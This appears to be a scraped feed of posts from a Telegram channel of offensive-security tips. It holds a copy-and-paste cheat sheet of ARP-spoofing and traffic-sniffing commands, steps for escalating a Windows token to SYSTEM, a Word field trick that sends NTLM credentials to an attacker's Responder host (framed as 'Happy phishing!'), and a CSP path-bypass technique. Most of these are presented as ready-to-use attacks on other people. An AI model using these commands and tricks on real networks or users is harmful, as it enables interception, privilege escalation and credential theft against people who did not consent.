Pentester
2.94K subscribers
120 photos
3 videos
163 files
2.77K links
- Offensive Security (Red Teaming / PenTesting)
- BlueTeam (OperationSec, TreatHunting, DFIR)
- Reverse Engineering / Malware Analisys
- Web Security
Download Telegram
MitM Copy&Paste Sheet 😎

#forwarding
sysctl -w net.ipv4.ip_forward=1

#redirect Traffic
arpspoof -i [Interface] -t [tgtIP] [RouterIP]

arpspoof -i [Interface] -t [RouterIP] [tgtIP]

#sniff pictures
driftnet -i [Interface]

#sniff URLs
urlsnarf -i [Interface]
Windows Token Privilege to "nt authority\system"

- Enable SE_DEBUG_NAME(debugprivileges) on the current process.
- Get a SYSTEM user token.
- Duplicate it to a Primary Token, so it can be passed to CreateProcess.
- Now we have duplicated the token, we can close the orginal.
- Enable SE_ASSIGNPRIMARYTOKEN_NAME and SE_INCREASE_QUOTA_NAME, these are both needed to start a process with a token.
- Enable SE_IMPERSONATE_NAME, so that we can impersonate the SYSTEM token.
- Start the process with the token.
- Clean up, revert back to self and close the handles

[Tool] Tokenvator3.5.exe
https://t.co/j8LOsvoZBH
Submitted this to MSRC, won't patch, it's a "feature"; Open Word -> CTRL + F9 -> IMPORT "\\\\Responder-IP\\1.jpg" -> right click and select "Edit Field" -> tick "Data not stored in document" -> save & close. Open the document -> free credentials :) Happy phishing!
Wireless Attacks on Aircraft Instrument Landing Systems
https://t.co/mRRTiUKSmg
If CSP policy points to a dir and you use %2f to encode "/", it is still considered to be inside the dir. All browsers seem to agree on that.

This leads to a possible bypass, by using "%2f..%2f" if server decodes it, example: https://t.co/Dl9hkKtlQc